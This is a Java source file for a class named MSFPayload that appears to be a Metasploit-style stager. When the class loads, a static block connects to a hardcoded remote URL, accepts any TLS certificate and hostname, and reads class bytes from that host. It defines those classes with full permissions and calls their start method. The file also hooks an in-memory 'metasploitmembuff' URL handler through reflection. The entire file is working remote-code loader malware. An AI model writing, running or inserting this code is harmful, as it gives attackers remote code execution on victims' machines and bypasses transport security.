import javax.net.ssl.HostnameVerifier; import javax.net.ssl.HttpsURLConnection; import javax.net.ssl.SSLContext; import javax.net.ssl.SSLSession; import javax.net.ssl.TrustManager; import javax.net.ssl.X509TrustManager; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.DataInputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.io.PrintStream; import java.lang.reflect.Field; import java.net.MalformedURLException; import java.net.URL; import java.net.URLConnection; import java.net.URLStreamHandler; import java.security.AllPermission; import java.security.CodeSource; import java.security.Permissions; import java.security.ProtectionDomain; import java.security.SecureRandom; import java.security.cert.Certificate; import java.security.cert.CertificateException; import java.security.cert.X509Certificate; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.StringTokenizer; public class MSFPayload extends ClassLoader implements X509TrustManager, HostnameVerifier { static { try { InputStream inputStream2 = null; // String payload = // "http://8.8.8.8:80/PC232C7SaB3sfHLxAsdd2ZQxBQWw1skJmGj5DO7arxpludiOmr0fjr1pPS8ZxjNsKshRxGa4NcaxItbSZ7m-M8nldoyhUuDwCb3d7Oe2y25vnzLwVdykwkx5sERWRDVHvDubsxPRdWg"; String payload = "https://8.8:443/7UPg239jNUWcRJhVwQ2sdfaqJmKQzPJvIyHR7WYuBKLvQEONsk8ux1DOqoGK0mfhj6lapZc-iMhi_LZOC_BAdoRCUgjWjf4JRv0YGtda44f4Vo1x9g-EhYKAmgpsj-Kj9Rja51MGYukYRI60lcS7OKa2fGLrTI8yQ"; if ( payload.startsWith( "https" ) ) { URLConnection obj = new URL( payload ).openConnection(); useFor( obj ); inputStream2 = ( obj ).getInputStream(); } else { inputStream2 = new URL( payload ).openStream(); } OutputStream outputStream = outputStream = new ByteArrayOutputStream(); ; // DataInputStream dataInputStream = new DataInputStream( inputStream2); // new MSFPayload().start(dataInputStream,outputStream,x); Object localObject6 = new StringTokenizer( "Payload -- " + "", " " ); String[] arrayOfString = new String[( (StringTokenizer) localObject6 ).countTokens()]; for ( int m = 0; m < arrayOfString.length; m++ ) { arrayOfString[m] = ( (StringTokenizer) localObject6 ).nextToken(); } new MSFPayload().bootstrap( inputStream2, outputStream, null, arrayOfString ); } catch ( IOException e ) { //e.printStackTrace(); } catch ( Exception e ) { //e.printStackTrace(); } } public final void bootstrap( InputStream inputStream, OutputStream outputStream, String string, String[] arrstring ) throws Exception { try { Class<?> class_ = null; DataInputStream dataInputStream = new DataInputStream( inputStream ); Permissions permissions = new Permissions(); permissions.add( new AllPermission() ); ProtectionDomain protectionDomain = new ProtectionDomain( new CodeSource( new URL( "file:///" ), new Certificate[0] ), permissions ); if ( string == null ) { int n = dataInputStream.readInt(); do { byte[] arrby = new byte[n]; dataInputStream.readFully( arrby ); class_ = this.defineClass( null, arrby, 0, n, protectionDomain ); this.resolveClass( class_ ); } while ( ( n = dataInputStream.readInt() ) > 0 ); } Object obj = class_.newInstance(); class_.getMethod( "start", DataInputStream.class, OutputStream.class, String[].class ).invoke( obj, dataInputStream, outputStream, arrstring ); } catch ( Throwable throwable ) { throwable.printStackTrace( new PrintStream( outputStream ) ); } } @Override public boolean verify( String s, SSLSession sslSession ) { return true; } @Override public void checkClientTrusted( X509Certificate[] x509Certificates, String s ) throws CertificateException { } @Override public void checkServerTrusted( X509Certificate[] x509Certificates, String s ) throws CertificateException { } @Override public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; } public static void useFor( URLConnection paramURLConnection ) throws Exception { if ( ( paramURLConnection instanceof HttpsURLConnection ) ) { HttpsURLConnection localHttpsURLConnection = (HttpsURLConnection) paramURLConnection; MSFPayload localPayloadTrustManager = new MSFPayload(); SSLContext localSSLContext = SSLContext.getInstance( "SSL" ); localSSLContext.init( null, new TrustManager[] { localPayloadTrustManager }, new SecureRandom() ); localHttpsURLConnection.setSSLSocketFactory( localSSLContext.getSocketFactory() ); localHttpsURLConnection.setHostnameVerifier( localPayloadTrustManager ); } } public static class MemoryBufferURLConnection extends URLConnection { private static List files; private final byte[] data; private final String contentType; /* */ protected MemoryBufferURLConnection( URL uRL ) { super( uRL ); String string = uRL.getFile(); int n = string.indexOf( 47 ); List list = files; synchronized ( list ) { this.data = (byte[]) files.get( Integer.parseInt( string.substring( 0, n ) ) ); } this.contentType = string.substring( n + 1 ); } /* */ static { files = new ArrayList(); try { Map map; Field field; try { field = URL.class.getDeclaredField( "handlers" ); } catch ( NoSuchFieldException noSuchFieldException ) { try { field = URL.class.getDeclaredField( "ph_cache" ); } catch ( NoSuchFieldException noSuchFieldException2 ) { throw noSuchFieldException; } } field.setAccessible( true ); Map map2 = map = (Map) field.get( null ); synchronized ( map2 ) { Object object; if ( map.containsKey( "metasploitmembuff" ) ) { object = map.get( "metasploitmembuff" ); } else { object = new MemoryBufferURLStreamHandler(); map.put( "metasploitmembuff", object ); } files = (List) object.getClass().getMethod( "getFiles", new Class[0] ).invoke( object, new Object[0] ); } } catch ( Exception exception ) { throw new RuntimeException( exception.toString() ); } } public void connect() throws IOException { } public InputStream getInputStream() throws IOException { return new ByteArrayInputStream( this.data ); } /* */ public static URL createURL( byte[] arrby, String string ) throws MalformedURLException { List list = files; synchronized ( list ) { files.add( arrby ); return new URL( "metasploitmembuff", "", "" + ( files.size() - 1 ) + "/" + string ); } } public int getContentLength() { return this.data.length; } public String getContentType() { return this.contentType; } } public static class MemoryBufferURLStreamHandler extends URLStreamHandler { private List files = new ArrayList(); protected URLConnection openConnection( URL uRL ) throws IOException { return new MemoryBufferURLConnection( uRL ); } public List getFiles() { return this.files; } } }